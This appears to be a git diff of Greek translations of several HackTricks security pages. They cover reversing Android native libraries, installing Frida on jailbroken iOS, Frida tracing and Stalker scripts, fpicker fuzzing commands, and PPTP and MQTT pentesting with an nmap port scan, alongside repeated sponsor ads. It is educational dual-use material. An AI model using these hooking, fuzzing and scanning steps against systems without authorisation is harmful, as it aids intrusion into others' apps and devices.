Οι εφαρμογές Android μπορούν να χρησιμοποιούν τοπικές βιβλιοθήκες, συνήθως γραμμένες σε C ή C++, για εργασίες κρίσιμες για την απόδοση. Οι δημιουργοί κακόβουλου λογισμικού χρησιμοποιούν επίσης αυτές τις βιβλιοθήκες, καθώς είναι πιο δύσκολο να αναστραφούν από τον αναλυτή κώδικα DEX. Η ενότητα επικεντρώνεται στις δεξιότητες αναστροφής κώδικα που προσαρμόζονται στο Android, αντί να διδάσκει γλώσσες συναρμολόγησης. Παρέχονται εκδόσεις ARM και x86 των βιβλιοθηκών για συμβατότητα.
|
||||
|
||||
### Κύρια Σημεία:
|
||||
- **Τοπικές Βιβλιοθήκες στις Εφαρμογές Android:**
|
||||
- Χρησιμοποιούνται για εργασίες με υψηλή απόδοση.
|
||||
- Γραμμένες σε C ή C++, κάνοντας την αντιστροφή δύσκολη.
|
||||
- Γραμμένες σε C ή C++, κάνοντας την αναστροφή δύσκολη.
|
||||
- Βρίσκονται σε μορφή `.so` (κοινόχρηστο αντικείμενο), παρόμοια με τα δυαδικά του Linux.
|
||||
- Οι δημιουργοί κακόβουλου λογισμικού προτιμούν τον τοπικό κώδικα για να δυσκολέψουν την ανάλυση.
|
||||
|
||||
- **Διεπαφή Ενσωμάτωσης Τοπικού Κώδικα (JNI) & Android NDK:**
|
||||
- **Διεπαφή Τοπικών Μεθόδων Java (JNI) & Android NDK:**
|
||||
- Η JNI επιτρέπει την υλοποίηση μεθόδων Java σε τοπικό κώδικα.
|
||||
- Το NDK είναι ένα σύνολο εργαλείων ειδικά για το Android για τη συγγραφή τοπικού κώδικα.
|
||||
- Η JNI και το NDK γέφυρωνουν τον κώδικα Java (ή Kotlin) με τις τοπικές βιβλιοθήκες.
|
||||
|
||||
- **Φόρτωση και Εκτέλεση Βιβλιοθηκών:**
|
||||
- Οι βιβλιοθήκες φορτώνονται στη μνήμη χρησιμοποιώντας τις `System.loadLibrary` ή `System.load`.
|
||||
- Οι βιβλιοθήκες φορτώνονται στη μνήμη χρησιμοποιώντας το `System.loadLibrary` ή το `System.load`.
|
||||
- Το JNI_OnLoad εκτελείται κατά τη φόρτωση της βιβλιοθήκης.
|
||||
- Οι μεθόδοι του Java που δηλώνονται ως τοπικές συνδέονται με τις τοπικές λειτουργίες, επιτρέποντας την εκτέλεση.
|
||||
- Οι μεθόδοι τοπικής καταγγελίας που δηλώνονται στη Java συνδέονται με τις τοπικές λειτουργίες, επιτρέποντας την εκτέλεση.
|
||||
|
||||
- **Σύνδεση Μεθόδων Java με Τοπικές Λειτουργίες:**
|
||||
- **Δυναμική Σύνδεση:** Τα ονόματα λειτουργιών στις τοπικές βιβλιοθήκες ταιριάζουν με ένα συγκεκριμένο πρότυπο, επιτρέποντας την αυτόματη σύνδεση.
|
||||
- **Δυναμική Σύνδεση:** Τα ονόματα των λειτουργιών στις τοπικές βιβλιοθήκες ταιριάζουν με ένα συγκεκριμένο πρότυπο, επιτρέποντας την αυτόματη σύνδεση.
|
||||
- **Στατική Σύνδεση:** Χρησιμοποιεί το `RegisterNatives` για τη σύνδεση, παρέχοντας ευελιξία στην ονοματολογία και τη δομή των λειτουργιών.
|
||||
|
||||
- **Εργαλεία και Τεχνικές Αντιστροφής Κώδικα:**
|
||||
- **Εργαλεία και Τεχνικές Αναστροφής Κώδικα:**
|
||||
- Εργαλεία όπως το Ghidra και το IDA Pro βοηθούν στην ανάλυση των τοπικών βιβλιοθηκών.
|
||||
- Το `JNIEnv` είναι κρίσιμο για την κατανόηση των μεθόδων JNI και των αλληλεπιδράσεων.
|
||||
- Παρέχονται ασκήσεις για εξάσκηση στη φόρτωση βιβλιοθηκών, σύνδεση μεθόδων και αναγνώριση τοπικών λειτουργιών.
|
||||
|
@ -70,3 +70,24 @@
|
|||
|
||||
- **Αποσφαλμάτωση Τοπικών Βιβλιοθηκών:**
|
||||
- [Αποσφαλμάτωση Τοπικών Βιβλιοθηκών Android χρησιμοποιώντας το JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜ
|
||||
|
|
|
@ -14,13 +14,13 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -30,7 +30,7 @@
|
|||
|
||||
## Εγκατάσταση του Frida
|
||||
|
||||
**Βήματα για την εγκατάσταση του Frida σε μια συσκευή Jailbroken:**
|
||||
**Βήματα για να εγκαταστήσετε το Frida σε μια συσκευή με Jailbreak:**
|
||||
|
||||
1. Ανοίξτε την εφαρμογή Cydia/Sileo.
|
||||
2. Πλοηγηθείτε σε Διαχείριση -> Πηγές -> Επεξεργασία -> Προσθήκη.
|
||||
|
@ -38,24 +38,24 @@
|
|||
4. Μεταβείτε στη νεοπροσταθείσα πηγή του Frida.
|
||||
5. Εγκαταστήστε το πακέτο του Frida.
|
||||
|
||||
Αν χρησιμοποιείτε το **Corellium** θα πρέπει να κατεβάσετε την έκδοση του Frida από [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) και να αποσυμπιέσετε και να αντιγράψετε στη θέση dylib που ζητάει ο Frida, π.χ.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
|
||||
Αν χρησιμοποιείτε το **Corellium** θα πρέπει να κατεβάσετε την έκδοση του Frida από [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) και να αποσυμπιέσετε και να αντιγράψετε στη θέση dylib που ζητάει το Frida, π.χ.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
|
||||
|
||||
Μετά την εγκατάσταση, μπορείτε να χρησιμοποιήσετε στον υπολογιστή σας την εντολή **`frida-ls-devices`** και να ελέγξετε ότι η συσκευή εμφανίζεται (ο υπολογιστής σας πρέπει να μπορεί να την προσπελάσει).\
|
||||
Εκτελέστε επίσης την εντολή **`frida-ps -Uia`** για να ελέγξετε τις εκτελούμενες διεργασίες του τηλεφώνου.
|
||||
|
||||
## Εγκατάσταση του Πελάτη Frida
|
||||
## Εγκατάσταση Πελάτη Frida
|
||||
|
||||
Εγκαταστήστε τα **εργαλεία frida**:
|
||||
```bash
|
||||
pip install frida-tools
|
||||
pip install frida
|
||||
```
|
||||
Με τον διακομιστή Frida εγκατεστημένο και τη συσκευή ενεργή και συνδεδεμένη, **ελέγξτε** αν ο πελάτης **λειτουργεί**:
|
||||
Με τον διακομιστή Frida εγκατεστημένο και τη συσκευή να λειτουργεί και συνδεδεμένη, **ελέγξτε** αν ο πελάτης **λειτουργεί**:
|
||||
```bash
|
||||
frida-ls-devices # List devices
|
||||
frida-ps -Uia # Get running processes
|
||||
```
|
||||
## Καταγραφή Frida
|
||||
## Καταγραφή με το Frida
|
||||
```bash
|
||||
# Functions
|
||||
## Trace all functions with the word "log" in their name
|
||||
|
@ -163,11 +163,11 @@ console.log("loaded");
|
|||
|
||||
### Frida Stalker
|
||||
|
||||
[Από τα έγγραφα](https://frida.re/docs/stalker/): Ο Stalker είναι η μηχανή **ανίχνευσης** κώδικα του Frida. Επιτρέπει την παρακολούθηση νημάτων, **καταγράφοντας** κάθε συνάρτηση, **κάθε μπλοκ**, ακόμα και κάθε εντολή που εκτελείται.
|
||||
[Από τα έγγραφα](https://frida.re/docs/stalker/): Ο Stalker είναι η μηχανή **καταγραφής κώδικα** του Frida. Επιτρέπει την παρακολούθηση νημάτων, **καταγράφοντας** κάθε συνάρτηση, **κάθε μπλοκ**, ακόμα και κάθε εντολή που εκτελείται.
|
||||
|
||||
Έχετε ένα παράδειγμα υλοποίησης του Frida Stalker στο [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
|
||||
|
||||
Αυτό είναι ένα άλλο παράδειγμα για να συνδέσετε το Frida Stalker κάθε φορά που καλείται μια συνάρτηση:
|
||||
Αυτό είναι ένα άλλο παράδειγμα για να συνδεθείτε με το Frida Stalker κάθε φορά που καλείται μια συνάρτηση:
|
||||
```javascript
|
||||
console.log("loading");
|
||||
const wg_log_addr = Module.findExportByName("<Program>", "<function_name>");
|
||||
|
@ -201,12 +201,12 @@ Stalker.flush(); // this is important to get all events
|
|||
});
|
||||
```
|
||||
{% hint style="danger" %}
|
||||
Αυτό είναι ενδιαφέρον για λόγους εντοπισμού σφαλμάτων, αλλά για το fuzzing, το συνεχές **`.follow()`** και **`.unfollow()`** είναι πολύ ανεπαρκές.
|
||||
Αυτό είναι ενδιαφέρον για σκοπούς εντοπισμού σφαλμάτων, αλλά για το fuzzing, το να είναι συνεχώς **`.follow()`** και **`.unfollow()`** είναι πολύ ανεπαρκές.
|
||||
{% endhint %}
|
||||
|
||||
## [Fpicker](https://github.com/ttdennis/fpicker)
|
||||
|
||||
[**fpicker**](https://github.com/ttdennis/fpicker) είναι ένα **Frida-based εργαλείο fuzzing** που προσφέρει μια ποικιλία λειτουργιών fuzzing για in-process fuzzing, όπως έναν τρόπο AFL++ ή έναν παθητικό τρόπο ανίχνευσης. Θα πρέπει να λειτουργεί σε όλες τις πλατφόρμες που υποστηρίζονται από το Frida.
|
||||
[**fpicker**](https://github.com/ttdennis/fpicker) είναι ένα **σύνολο εργαλείων fuzzing βασισμένο σε Frida** που προσφέρει μια ποικιλία λειτουργιών fuzzing για fuzzing εντός διεργασιών, όπως έναν τρόπο AFL++ ή έναν παθητικό τρόπο ανίχνευσης. Θα πρέπει να λειτουργεί σε όλες τις πλατφόρμες που υποστηρίζονται από το Frida.
|
||||
|
||||
* [**Εγκατάσταση fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
|
||||
```bash
|
||||
|
@ -237,7 +237,7 @@ mkdir -p examples/wg-log/in # For starting inputs
|
|||
# Create at least 1 input for the fuzzer
|
||||
echo Hello World > examples/wg-log/in/0
|
||||
```
|
||||
* **Fuzzer script** (`παραδείγματα/wg-log/myfuzzer.js`):
|
||||
* **Σενάριο Fuzzer** (`παραδείγματα/wg-log/myfuzzer.js`):
|
||||
|
||||
{% code title="παραδείγματα/wg-log/myfuzzer.js" %}
|
||||
```javascript
|
||||
|
@ -319,7 +319,7 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
|
|||
{% endcode %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
Σε αυτήν την περίπτωση **δεν επανεκκινούμε την εφαρμογή ή επαναφέρουμε την κατάσταση** μετά από κάθε φορτωτή. Έτσι, αν το Frida βρει ένα **σφάλμα** τα **επόμενα δεδομένα εισόδου** μετά από αυτόν τον φορτωτή ενδέχεται επίσης να **καταρρεύσουν την εφαρμογή** (επειδή η εφαρμογή βρίσκεται σε μη σταθερή κατάσταση), ακόμη κι αν η **είσοδος δεν θα έπρεπε να καταρρεύσει** την εφαρμογή.
|
||||
Σε αυτήν την περίπτωση **δεν επανεκκινούμε την εφαρμογή ή επαναφέρουμε την κατάσταση** μετά από κάθε φορτωτή. Έτσι, αν το Frida βρει ένα **σφάλμα**, τα **επόμενα δεδομένα εισόδου** μετά από αυτόν τον φορτωτή ενδέχεται επίσης να **καταρρεύσουν την εφαρμογή** (επειδή η εφαρμογή βρίσκεται σε μη σταθερή κατάσταση), ακόμα κι αν η **είσοδος δεν θα έπρεπε να καταρρεύσει** την εφαρμογή.
|
||||
|
||||
Επιπλέον, το Frida θα συνδεθεί με τα σήματα εξαιρέσεων του iOS, οπότε όταν το **Frida βρει ένα σφάλμα**, πιθανώς δεν θα δημιουργηθούν **αναφορές κατάρρευσης του iOS**.
|
||||
|
||||
|
@ -330,7 +330,7 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
|
|||
|
||||
Μπορείτε να ελέγξετε τη **κονσόλα macOS** ή το **`log`** cli για να ελέγξετε τα αρχεία καταγραφής του macOS.\
|
||||
Μπορείτε επίσης να ελέγξετε τα αρχεία καταγραφής από το iOS χρησιμοποιώντας το **`idevicesyslog`**.\
|
||||
Ορισμένες καταγραφές θα παραλείπουν πληροφορίες προσθέτοντας **`<private>`**. Για να εμφανιστούν όλες οι πληροφορίες, πρέπει να εγκαταστήσετε κάποιο προφίλ από [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) για να ενεργοποιήσετε αυτές τις ιδιωτικές πληροφορίες.
|
||||
Ορισμένα αρχεία καταγραφής θα παραλείπουν πληροφορίες προσθέτοντας **`<private>`**. Για να εμφανιστούν όλες οι πληροφορίες, πρέπει να εγκαταστήσετε κάποιο προφίλ από [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) για να ενεργοποιήσετε αυτές τις ιδιωτικές πληροφορίες.
|
||||
|
||||
Αν δεν ξέρετε τι να κάνετε:
|
||||
```sh
|
||||
|
@ -356,7 +356,7 @@ killall -9 logd
|
|||
* `~/Library/Logs/DiagnosticReports`
|
||||
|
||||
{% hint style="warning" %}
|
||||
Το iOS αποθηκεύει μόνο 25 κρασαρίσματα της ίδιας εφαρμογής, οπότε πρέπει να το καθαρίσετε αυτό, αλλιώς το iOS θα σταματήσει να δημιουργεί κρασαρίσματα.
|
||||
Το iOS αποθηκεύει μόνο 25 κρασαρίσματα της ίδιας εφαρμογής, οπότε πρέπει να τα καθαρίσετε διαφορετικά το iOS θα σταματήσει να δημιουργεί κρασαρίσματα.
|
||||
{% endhint %}
|
||||
|
||||
## Οδηγοί Frida Android
|
||||
|
@ -370,29 +370,29 @@ killall -9 logd
|
|||
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,23 +6,23 @@
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,7 +30,7 @@
|
|||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το **Πρωτόκολλο Σημείου προς Σημείο Συνάρτησης (PPTP)** είναι μια μέθοδος που χρησιμοποιείται ευρέως για τη **απομακρυσμένη πρόσβαση** σε κινητές συσκευές. Χρησιμοποιεί τη **θύρα TCP 1723** για την ανταλλαγή κλειδιών, ενώ το **πρωτόκολλο IP 47** (Γενική Ενθυλάκωση Δρομολόγησης, ή **GRE**), χρησιμοποιείται για την κρυπτογράφηση των δεδομένων που μεταδίδονται μεταξύ των συνομιλητών. Αυτή η ρύθμιση είναι κρίσιμη για τη δημιουργία ενός ασφαλούς καναλιού επικοινωνίας στο διαδίκτυο, εξασφαλίζοντας ότι τα ανταλλασσόμενα δεδομένα παραμένουν εμπιστευτικά και προστατευμένα από μη εξουσιοδοτημένη πρόσβαση.
|
||||
Το **Πρωτόκολλο Σημείου προς Σημείο Σύνδεσης (PPTP)** είναι μια μέθοδος που χρησιμοποιείται ευρέως για τη **απομακρυσμένη πρόσβαση** σε κινητές συσκευές. Χρησιμοποιεί τη **θύρα TCP 1723** για την ανταλλαγή κλειδιών, ενώ το **πρωτόκολλο IP 47** (Γενική Ενθυλάκωση Δρομολόγησης, ή **GRE**), χρησιμοποιείται για την κρυπτογράφηση των δεδομένων που μεταδίδονται μεταξύ των συνομιλητών. Αυτή η ρύθμιση είναι κρίσιμη για τη δημιουργία ενός ασφαλούς καναλιού επικοινωνίας στο διαδίκτυο, εξασφαλίζοντας ότι τα ανταλλασσόμενα δεδομένα παραμένουν εμπιστευτικά και προστατευμένα από μη εξουσιοδοτημένη πρόσβαση.
|
||||
|
||||
**Προεπιλεγμένη Θύρα**:1723
|
||||
|
||||
|
@ -38,7 +38,7 @@
|
|||
```bash
|
||||
nmap –Pn -sSV -p1723 <IP>
|
||||
```
|
||||
### [Επίθεση Βίας](../generic-methodologies-and-resources/brute-force.md#pptp)
|
||||
### [Επίθεση Με Βία](../generic-methodologies-and-resources/brute-force.md#pptp)
|
||||
|
||||
## Ευπάθειες
|
||||
* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
# 1883 - Ελέγχος Εισβολής στο MQTT (Mosquitto)
|
||||
# 1883 - Ελεγχος Ευπαθειών MQTT (Mosquitto)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
|
@ -14,13 +14,13 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -30,7 +30,7 @@
|
|||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το **MQ Telemetry Transport (MQTT)** είναι γνωστό ως ένα πρωτόκολλο **δημοσίευσης/συνδρομής μηνυμάτων** που ξεχωρίζει για την ακραία απλότητα και ελαφρότητά του. Αυτό το πρωτόκολλο είναι σχεδιασμένο ειδικά για περιβάλλοντα όπου οι συσκευές έχουν περιορισμένες δυνατότητες και λειτουργούν σε δίκτυα που χαρακτηρίζονται από χαμηλό εύρος ζώνης, υψηλή καθυστέρηση ή αναξιόπιστες συνδέσεις. Οι βασικοί στόχοι του MQTT περιλαμβάνουν την ελαχιστοποίηση της χρήσης της δικτυακής ζώνης και τη μείωση της ζήτησης στους πόρους της συσκευής. Επιπλέον, στοχεύει στη διατήρηση αξιόπιστης επικοινωνίας και στην παροχή ενός συγκεκριμένου επιπέδου διασφάλισης παράδοσης. Αυτοί οι στόχοι καθιστούν το MQTT εξαιρετικά κατάλληλο για τον αναπτυσσόμενο τομέα της **επικοινωνίας μηχανής προς μηχανή (M2M)** και του **Διαδικτύου των Πραγμάτων (IoT)**, όπου είναι ουσιώδες να συνδέονται αποτελεσματικά μια πληθώρα συσκευών. Επιπλέον, το MQTT είναι υψίστης ωφέλειας για τις κινητές εφαρμογές, όπου η διατήρηση της ζώνης ζώνης και της διάρκειας ζωής της μπαταρίας είναι κρίσιμη.
|
||||
